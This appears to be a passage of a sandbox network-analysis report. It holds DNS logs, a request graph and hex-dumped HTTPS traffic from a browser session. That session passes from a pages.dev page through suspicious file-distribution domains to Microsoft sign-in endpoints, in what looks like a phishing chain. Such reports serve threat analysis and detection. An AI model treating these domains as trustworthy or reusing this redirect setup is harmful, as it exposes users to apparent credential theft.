Sep 1, 2024 00:54:34.281321049 CEST	192.168.2.6	1.1.1.1	0x4cad	Standard query (0)	bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev	65	IN (0x0001)	false
Sep 1, 2024 00:54:35.140753984 CEST	192.168.2.6	1.1.1.1	0x1aad	Standard query (0)	palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:54:35.142021894 CEST	192.168.2.6	1.1.1.1	0xc750	Standard query (0)	palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev	65	IN (0x0001)	false
Sep 1, 2024 00:54:36.176887035 CEST	192.168.2.6	1.1.1.1	0x86e2	Standard query (0)	fetchlnk.truesharingzone.site	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:54:36.177431107 CEST	192.168.2.6	1.1.1.1	0xbfe8	Standard query (0)	fetchlnk.truesharingzone.site	65	IN (0x0001)	false
Sep 1, 2024 00:54:37.019294977 CEST	192.168.2.6	1.1.1.1	0x996	Standard query (0)	theextrenalfiles.filesdistributorin.online	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:54:37.020096064 CEST	192.168.2.6	1.1.1.1	0x9951	Standard query (0)	theextrenalfiles.filesdistributorin.online	65	IN (0x0001)	false
Sep 1, 2024 00:54:38.291085005 CEST	192.168.2.6	1.1.1.1	0xf80e	Standard query (0)	basicplan.filesdistributorin.online	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:54:38.292041063 CEST	192.168.2.6	1.1.1.1	0x65f0	Standard query (0)	basicplan.filesdistributorin.online	65	IN (0x0001)	false
Sep 1, 2024 00:54:38.619719982 CEST	192.168.2.6	1.1.1.1	0x907c	Standard query (0)	theextrenalfiles.filesdistributorin.online	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:54:38.620124102 CEST	192.168.2.6	1.1.1.1	0x8bfd	Standard query (0)	theextrenalfiles.filesdistributorin.online	65	IN (0x0001)	false
Sep 1, 2024 00:54:39.242568970 CEST	192.168.2.6	1.1.1.1	0xb87a	Standard query (0)	a.nel.cloudflare.com	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:54:39.242999077 CEST	192.168.2.6	1.1.1.1	0x486b	Standard query (0)	a.nel.cloudflare.com	65	IN (0x0001)	false
Sep 1, 2024 00:54:39.532596111 CEST	192.168.2.6	1.1.1.1	0xbcf9	Standard query (0)	basicplan.filesdistributorin.online	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:54:39.532927036 CEST	192.168.2.6	1.1.1.1	0x30df	Standard query (0)	basicplan.filesdistributorin.online	65	IN (0x0001)	false
Sep 1, 2024 00:54:53.639015913 CEST	192.168.2.6	1.1.1.1	0xd63	Standard query (0)	signup.live.com	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:54:53.640223980 CEST	192.168.2.6	1.1.1.1	0x9f76	Standard query (0)	signup.live.com	65	IN (0x0001)	false
Sep 1, 2024 00:54:56.086211920 CEST	192.168.2.6	1.1.1.1	0xe192	Standard query (0)	logincdn.msftauth.net	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:54:56.086699009 CEST	192.168.2.6	1.1.1.1	0x2e47	Standard query (0)	logincdn.msftauth.net	65	IN (0x0001)	false
Sep 1, 2024 00:54:59.241662979 CEST	192.168.2.6	1.1.1.1	0xd7a7	Standard query (0)	fpt.live.com	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:54:59.241869926 CEST	192.168.2.6	1.1.1.1	0x86e8	Standard query (0)	fpt.live.com	65	IN (0x0001)	false
Sep 1, 2024 00:54:59.243803978 CEST	192.168.2.6	1.1.1.1	0x2077	Standard query (0)	msft.hsprotect.net	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:54:59.244122028 CEST	192.168.2.6	1.1.1.1	0x6f07	Standard query (0)	msft.hsprotect.net	65	IN (0x0001)	false
Sep 1, 2024 00:54:59.430973053 CEST	192.168.2.6	1.1.1.1	0x7532	Standard query (0)	signup.live.com	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:54:59.431199074 CEST	192.168.2.6	1.1.1.1	0xbc6d	Standard query (0)	signup.live.com	65	IN (0x0001)	false
Sep 1, 2024 00:55:00.207576990 CEST	192.168.2.6	1.1.1.1	0x89a6	Standard query (0)	client.hsprotect.net	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:55:00.207577944 CEST	192.168.2.6	1.1.1.1	0xeb48	Standard query (0)	client.hsprotect.net	65	IN (0x0001)	false
Sep 1, 2024 00:55:01.560748100 CEST	192.168.2.6	1.1.1.1	0x2d6f	Standard query (0)	stk.hsprotect.net	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:55:01.560983896 CEST	192.168.2.6	1.1.1.1	0x57be	Standard query (0)	stk.hsprotect.net	65	IN (0x0001)	false
Sep 1, 2024 00:55:01.593019009 CEST	192.168.2.6	1.1.1.1	0x2491	Standard query (0)	collector-pxzc5j78di.hsprotect.net	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:55:01.593323946 CEST	192.168.2.6	1.1.1.1	0x67d	Standard query (0)	collector-pxzc5j78di.hsprotect.net	65	IN (0x0001)	false
Sep 1, 2024 00:55:01.714266062 CEST	192.168.2.6	1.1.1.1	0x50c8	Standard query (0)	client.hsprotect.net	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:55:01.714416027 CEST	192.168.2.6	1.1.1.1	0x5174	Standard query (0)	client.hsprotect.net	65	IN (0x0001)	false
Sep 1, 2024 00:55:02.202044964 CEST	192.168.2.6	1.1.1.1	0x431b	Standard query (0)	fpt.live.com	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:55:02.202873945 CEST	192.168.2.6	1.1.1.1	0x4586	Standard query (0)	fpt.live.com	65	IN (0x0001)	false
Sep 1, 2024 00:55:02.252212048 CEST	192.168.2.6	1.1.1.1	0xb84b	Standard query (0)	collector-pxzc5j78di.hsprotect.net	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:55:02.252661943 CEST	192.168.2.6	1.1.1.1	0x142a	Standard query (0)	collector-pxzc5j78di.hsprotect.net	65	IN (0x0001)	false
Sep 1, 2024 00:55:02.280659914 CEST	192.168.2.6	1.1.1.1	0x9138	Standard query (0)	stk.hsprotect.net	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:55:02.281024933 CEST	192.168.2.6	1.1.1.1	0x2a79	Standard query (0)	stk.hsprotect.net	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 1, 2024 00:54:31.280009031 CEST	1.1.1.1	192.168.2.6	0xa0cd	No error (0)	bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev		172.66.47.137	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:54:31.280009031 CEST	1.1.1.1	192.168.2.6	0xa0cd	No error (0)	bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev		172.66.44.119	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:54:31.284708023 CEST	1.1.1.1	192.168.2.6	0xe046	No error (0)	bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev			65	IN (0x0001)	false
Sep 1, 2024 00:54:33.294583082 CEST	1.1.1.1	192.168.2.6	0x2bf9	No error (0)	fetchlnk.truesharingzone.site		162.254.39.141	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:54:33.744765997 CEST	1.1.1.1	192.168.2.6	0x5482	No error (0)	www.google.com		142.250.186.132	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:54:33.747549057 CEST	1.1.1.1	192.168.2.6	0xe926	No error (0)	www.google.com			65	IN (0x0001)	false
Sep 1, 2024 00:54:34.292238951 CEST	1.1.1.1	192.168.2.6	0xf532	No error (0)	bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev		172.66.47.137	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:54:34.292238951 CEST	1.1.1.1	192.168.2.6	0xf532	No error (0)	bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev		172.66.44.119	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:54:34.293895006 CEST	1.1.1.1	192.168.2.6	0x4cad	No error (0)	bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev			65	IN (0x0001)	false
Sep 1, 2024 00:54:35.153295994 CEST	1.1.1.1	192.168.2.6	0x1aad	No error (0)	palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev		172.66.47.41	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:54:35.153295994 CEST	1.1.1.1	192.168.2.6	0x1aad	No error (0)	palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev		172.66.44.215	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:54:35.156641960 CEST	1.1.1.1	192.168.2.6	0xc750	No error (0)	palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev			65	IN (0x0001)	false
Sep 1, 2024 00:54:36.190519094 CEST	1.1.1.1	192.168.2.6	0x86e2	No error (0)	fetchlnk.truesharingzone.site		162.254.39.141	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:54:37.030749083 CEST	1.1.1.1	192.168.2.6	0x996	No error (0)	theextrenalfiles.filesdistributorin.online		162.254.39.141	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:54:38.323896885 CEST	1.1.1.1	192.168.2.6	0xf80e	No error (0)	basicplan.filesdistributorin.online		162.254.39.141	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:54:38.626808882 CEST	1.1.1.1	192.168.2.6	0x907c	No error (0)	theextrenalfiles.filesdistributorin.online		162.254.39.141	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:54:39.249092102 CEST	1.1.1.1	192.168.2.6	0xb87a	No error (0)	a.nel.cloudflare.com		35.190.80.1	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:54:39.502855062 CEST	1.1.1.1	192.168.2.6	0x6bf4	No error (0)	shed.dual-low.s-part-0016.t-0009.t-msedge.net	s-part-0016.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 1, 2024 00:54:39.502855062 CEST	1.1.1.1	192.168.2.6	0x6bf4	No error (0)	s-part-0016.t-0009.t-msedge.net		13.107.246.44	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:54:39.543626070 CEST	1.1.1.1	192.168.2.6	0xbcf9	No error (0)	basicplan.filesdistributorin.online		162.254.39.141	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:54:40.745569944 CEST	1.1.1.1	192.168.2.6	0x4d3a	No error (0)	shed.dual-low.s-part-0045.t-0009.t-msedge.net	s-part-0045.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 1, 2024 00:54:40.745569944 CEST	1.1.1.1	192.168.2.6	0x4d3a	No error (0)	s-part-0045.t-0009.t-msedge.net		13.107.246.73	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:54:41.284703970 CEST	1.1.1.1	192.168.2.6	0xd4d6	No error (0)	shed.dual-low.s-part-0032.t-0009.t-msedge.net	s-part-0032.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 1, 2024 00:54:41.284703970 CEST	1.1.1.1	192.168.2.6	0xd4d6	No error (0)	s-part-0032.t-0009.t-msedge.net		13.107.246.60	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:54:41.716912985 CEST	1.1.1.1	192.168.2.6	0x9ac	No error (0)	shed.dual-low.s-part-0014.t-0009.t-msedge.net	s-part-0014.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 1, 2024 00:54:41.716912985 CEST	1.1.1.1	192.168.2.6	0x9ac	No error (0)	s-part-0014.t-0009.t-msedge.net		13.107.246.42	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:54:44.156168938 CEST	1.1.1.1	192.168.2.6	0x68f6	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 1, 2024 00:54:44.156168938 CEST	1.1.1.1	192.168.2.6	0x68f6	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:54:45.416321993 CEST	1.1.1.1	192.168.2.6	0xb112	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:54:45.416321993 CEST	1.1.1.1	192.168.2.6	0xb112	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:54:53.645780087 CEST	1.1.1.1	192.168.2.6	0xd63	No error (0)	signup.live.com	account.msa.msidentity.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 1, 2024 00:54:53.674654007 CEST	1.1.1.1	192.168.2.6	0x9f76	No error (0)	signup.live.com	account.msa.msidentity.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 1, 2024 00:54:56.092289925 CEST	1.1.1.1	192.168.2.6	0xf833	No error (0)	shed.dual-low.s-part-0032.t-0009.t-msedge.net	s-part-0032.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 1, 2024 00:54:56.092289925 CEST	1.1.1.1	192.168.2.6	0xf833	No error (0)	s-part-0032.t-0009.t-msedge.net		13.107.246.60	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:54:56.093658924 CEST	1.1.1.1	192.168.2.6	0xe192	No error (0)	logincdn.msftauth.net	scdn38c07.wpc.9da5e.alphacdn.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 1, 2024 00:54:56.093658924 CEST	1.1.1.1	192.168.2.6	0xe192	No error (0)	scdn38c07.wpc.9da5e.alphacdn.net	sni1gl.wpc.alphacdn.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 1, 2024 00:54:56.093658924 CEST	1.1.1.1	192.168.2.6	0xe192	No error (0)	sni1gl.wpc.alphacdn.net		152.199.21.175	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:54:56.106750011 CEST	1.1.1.1	192.168.2.6	0x4c61	No error (0)	shed.dual-low.s-part-0039.t-0009.t-msedge.net	s-part-0039.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 1, 2024 00:54:56.106750011 CEST	1.1.1.1	192.168.2.6	0x4c61	No error (0)	s-part-0039.t-0009.t-msedge.net		13.107.246.67	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:54:56.108783960 CEST	1.1.1.1	192.168.2.6	0x69e	No error (0)	scdn38c07.wpc.9da5e.alphacdn.net	sni1gl.wpc.alphacdn.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 1, 2024 00:54:56.108825922 CEST	1.1.1.1	192.168.2.6	0x505f	No error (0)	scdn38c07.wpc.9da5e.alphacdn.net	sni1gl.wpc.alphacdn.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 1, 2024 00:54:56.108825922 CEST	1.1.1.1	192.168.2.6	0x505f	No error (0)	sni1gl.wpc.alphacdn.net		152.199.21.175	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:54:56.109502077 CEST	1.1.1.1	192.168.2.6	0x2e47	No error (0)	logincdn.msftauth.net	scdn38c07.wpc.9da5e.alphacdn.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 1, 2024 00:54:56.109502077 CEST	1.1.1.1	192.168.2.6	0x2e47	No error (0)	scdn38c07.wpc.9da5e.alphacdn.net	sni1gl.wpc.alphacdn.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 1, 2024 00:54:59.248531103 CEST	1.1.1.1	192.168.2.6	0x86e8	No error (0)	fpt.live.com	fpt.microsoft.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 1, 2024 00:54:59.249250889 CEST	1.1.1.1	192.168.2.6	0xd7a7	No error (0)	fpt.live.com	fpt.microsoft.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 1, 2024 00:54:59.251305103 CEST	1.1.1.1	192.168.2.6	0x6f07	No error (0)	msft.hsprotect.net	msft.hsprotect.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 1, 2024 00:54:59.252507925 CEST	1.1.1.1	192.168.2.6	0x2077	No error (0)	msft.hsprotect.net	msft.hsprotect.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 1, 2024 00:54:59.437432051 CEST	1.1.1.1	192.168.2.6	0x7532	No error (0)	signup.live.com	account.msa.msidentity.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 1, 2024 00:54:59.438354015 CEST	1.1.1.1	192.168.2.6	0xbc6d	No error (0)	signup.live.com	account.msa.msidentity.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 1, 2024 00:55:00.216080904 CEST	1.1.1.1	192.168.2.6	0x89a6	No error (0)	client.hsprotect.net	client.hsprotect.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 1, 2024 00:55:00.230057955 CEST	1.1.1.1	192.168.2.6	0xeb48	No error (0)	client.hsprotect.net	client.hsprotect.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 1, 2024 00:55:01.569099903 CEST	1.1.1.1	192.168.2.6	0x2d6f	No error (0)	stk.hsprotect.net		34.107.199.61	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:55:01.600517988 CEST	1.1.1.1	192.168.2.6	0x2491	No error (0)	collector-pxzc5j78di.hsprotect.net	inbound-weighted.protechts.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 1, 2024 00:55:01.600517988 CEST	1.1.1.1	192.168.2.6	0x2491	No error (0)	inbound-weighted.protechts.net		35.190.10.96	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:55:01.600543022 CEST	1.1.1.1	192.168.2.6	0x67d	No error (0)	collector-pxzc5j78di.hsprotect.net	inbound-weighted.protechts.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 1, 2024 00:55:01.722778082 CEST	1.1.1.1	192.168.2.6	0x5174	No error (0)	client.hsprotect.net	client.hsprotect.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 1, 2024 00:55:01.723249912 CEST	1.1.1.1	192.168.2.6	0x50c8	No error (0)	client.hsprotect.net	client.hsprotect.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 1, 2024 00:55:02.215945959 CEST	1.1.1.1	192.168.2.6	0x4586	No error (0)	fpt.live.com	fpt.microsoft.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 1, 2024 00:55:02.215996027 CEST	1.1.1.1	192.168.2.6	0x431b	No error (0)	fpt.live.com	fpt.microsoft.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 1, 2024 00:55:02.230324984 CEST	1.1.1.1	192.168.2.6	0xf44e	No error (0)	shed.dual-low.s-part-0014.t-0009.t-msedge.net	s-part-0014.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 1, 2024 00:55:02.230324984 CEST	1.1.1.1	192.168.2.6	0xf44e	No error (0)	s-part-0014.t-0009.t-msedge.net		13.107.246.42	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:55:02.259927034 CEST	1.1.1.1	192.168.2.6	0xb84b	No error (0)	collector-pxzc5j78di.hsprotect.net	inbound-weighted.protechts.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 1, 2024 00:55:02.259927034 CEST	1.1.1.1	192.168.2.6	0xb84b	No error (0)	inbound-weighted.protechts.net		35.190.10.96	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:55:02.260185003 CEST	1.1.1.1	192.168.2.6	0x142a	No error (0)	collector-pxzc5j78di.hsprotect.net	inbound-weighted.protechts.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 1, 2024 00:55:02.287412882 CEST	1.1.1.1	192.168.2.6	0x9138	No error (0)	stk.hsprotect.net		34.107.199.61	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:55:03.009545088 CEST	1.1.1.1	192.168.2.6	0x4268	No error (0)	shed.dual-low.s-part-0032.t-0009.t-msedge.net	s-part-0032.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 1, 2024 00:55:03.009545088 CEST	1.1.1.1	192.168.2.6	0x4268	No error (0)	s-part-0032.t-0009.t-msedge.net		13.107.246.60	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:55:45.615605116 CEST	1.1.1.1	192.168.2.6	0x6eaf	No error (0)	edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		217.20.57.40	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:55:45.615605116 CEST	1.1.1.1	192.168.2.6	0x6eaf	No error (0)	edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		217.20.57.41	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:55:45.615605116 CEST	1.1.1.1	192.168.2.6	0x6eaf	No error (0)	edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		84.201.210.20	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:55:45.615605116 CEST	1.1.1.1	192.168.2.6	0x6eaf	No error (0)	edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		217.20.57.38	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:55:45.615605116 CEST	1.1.1.1	192.168.2.6	0x6eaf	No error (0)	edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		217.20.57.21	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:55:45.615605116 CEST	1.1.1.1	192.168.2.6	0x6eaf	No error (0)	edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		217.20.57.36	A (IP address)	IN (0x0001)	false
Sep 1, 2024 00:55:45.615605116 CEST	1.1.1.1	192.168.2.6	0x6eaf	No error (0)	edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		217.20.57.20	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev

https:

fetchlnk.truesharingzone.site

palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev

theextrenalfiles.filesdistributorin.online

basicplan.filesdistributorin.online

logincdn.msauth.net

collector-pxzc5j78di.hsprotect.net

stk.hsprotect.net

acctcdn.msauth.net

fs.microsoft.com

aadcdn.msauth.net

a.nel.cloudflare.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49715	172.66.47.137	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:54:31 UTC	711	OUT	GET / HTTP/1.1 Host: bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:54:31 UTC	792	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 22:54:31 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=0, must-revalidate referrer-policy: strict-origin-when-cross-origin x-content-type-options: nosniff Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2A5%2B11661SCKRqlbnaNqryTZ5vAo9disiR%2B9Cq8oQRztpxqa96aJcY4MBmC8z3poaXu%2Fw21Iy5oK6oy4ROp0KJJHJVcG08U5NBuxyjayzah4Zr1l%2Bikv5354IkGzJ0lUIpITsnNoCp2adD7KVl5Pg8ySlJZ06bTQ4BwO0fAQbht%2FhOkXof8773BcNC7Y50sILBD7h9jKsw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bc09a58eee98c5f-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 22:54:31 UTC	577	IN	Data Raw: 34 61 65 66 0d 0a 3c 64 69 76 20 69 64 3d 22 68 62 67 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 31 30 30 70 78 3b 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 20 30 20 61 75 74 6f 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 22 3e 0d 0a 3c 69 6d 67 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 31 30 30 25 3b 22 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 4d 67 41 41 41 43 35 43 41 59 41 41 41 42 74 4a 6e 44 36 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 41 41 52 6e 51 55 31 42 41 41 43 78 6a 77 76 38 59 51 55 41 41 41 41 4a 63 45 68 5a 63 77 41 41 44 73 49 41 41 41 37 43 41 52 55 6f 53 6f 41 41 41 44 4c 46 53 Data Ascii: 4aef<div id="hbg" style="width: 100px;margin: 0 auto; 0 auto;visibility:hidden;"><img style="width: 100%;" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAMgAAAC5CAYAAABtJnD6AAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsIAAA7CARUoSoAAADLFS
2024-08-31 22:54:31 UTC	1369	IN	Data Raw: 6a 63 69 72 48 37 4d 4d 42 7a 43 53 37 73 4f 52 36 51 59 64 54 59 59 34 2b 31 6a 5a 75 2f 57 45 4c 79 50 45 46 2b 48 4a 79 7a 46 36 73 78 68 6a 34 63 2b 31 50 6a 64 6c 42 6b 4e 48 52 74 2b 50 2f 52 55 45 67 78 36 78 46 6f 58 41 44 56 68 4b 76 30 71 46 55 6d 42 30 45 4b 52 52 49 6b 42 77 35 69 4c 66 70 59 79 72 55 50 6b 48 65 66 66 64 43 2f 44 38 2f 43 4f 53 59 39 53 67 55 4c 70 58 66 76 7a 2f 31 75 4a 38 4e 4d 30 67 48 33 50 7a 41 6d 79 4f 48 4c 4a 62 54 76 57 33 61 58 78 4b 31 54 35 43 36 75 74 6c 37 4d 7a 53 48 44 33 57 59 52 56 4b 50 69 64 6c 68 67 2b 54 49 55 53 5a 79 67 75 54 49 6b 59 43 63 49 44 6c 79 4a 43 41 6e 53 49 34 63 43 63 67 4a 6b 69 4e 48 41 6e 4b 43 35 4d 69 52 67 4a 77 67 4f 58 49 6b 49 43 64 49 6a 68 77 4a 79 41 6d 53 49 30 63 43 63 6f Data Ascii: jcirH7MMBzCS7sOR6QYdTYY4+1jZu/WELyPEF+HJyzF6sxhj4c+1PjdlBkNHRt+P/RUEgx6xFoXADVhKv0qFUmB0EKRRIkBw5iLfpYyrUPkHeffdC/D8/COSY9SgULpXfvz/1uJ8NM0gH3PzAmyOHLJbTvW3aXxK1T5C6utl7MzSHD3WYRVKPidlhg+TIUSZyguTIkYCcIDlyJCAnSI4cCcgJkiNHAnKC5MiRgJwgOXIkICdIjhwJyAmSI0cCco
2024-08-31 22:54:31 UTC	1369	IN	Data Raw: 52 59 63 79 44 41 5a 4c 4d 57 74 2f 55 62 2b 63 50 6c 62 70 4d 69 51 75 74 78 77 69 64 56 71 6a 68 47 4d 35 41 31 65 56 77 33 38 67 77 63 72 7a 67 32 55 58 2b 63 43 5a 67 7a 50 49 73 63 4d 49 65 32 61 52 61 6b 51 5a 7a 61 39 57 57 47 65 38 37 6e 72 38 6d 78 64 30 6c 42 4b 55 67 4b 57 59 4f 6f 32 46 72 50 71 45 4b 73 63 71 4c 45 30 65 35 5a 52 6a 6b 43 71 74 70 63 53 36 6c 56 4d 65 30 35 41 4d 64 41 55 73 6d 39 71 58 77 72 61 41 41 57 34 49 51 33 53 42 49 42 55 31 5a 67 71 68 71 31 77 4c 73 43 39 4a 6c 36 63 66 45 46 72 52 38 71 5a 47 52 57 6d 73 68 50 51 6d 64 55 53 59 70 67 79 6b 54 71 75 56 79 69 55 47 77 58 53 52 64 6b 42 51 44 2f 75 6a 64 54 47 38 49 45 73 64 77 6e 4f 67 63 4b 5a 58 5a 47 51 59 59 66 68 72 61 41 42 57 4f 38 59 4a 55 70 42 4f 37 59 73 Data Ascii: RYcyDAZLMWt/Ub+cPlbpMiQutxwidVqjhGM5A1eVw38gwcrzg2UX+cCZgzPIscMIe2aRakQZza9WWGe87nr8mxd0lBKUgKWYOo2FrPqEKscqLE0e5ZRjkCqtpcS6lVMe05AMdAUsm9qXwraAAW4IQ3SBIBU1Zgqhq1wLsC9Jl6cfEFrR8qZGRWmshPQmdUSYpgykTquVyiUGwXSRdkBQD/ujdTG8IEsdwnOgcKZXZGQYYfhraABWO8YJUpBO7Ys
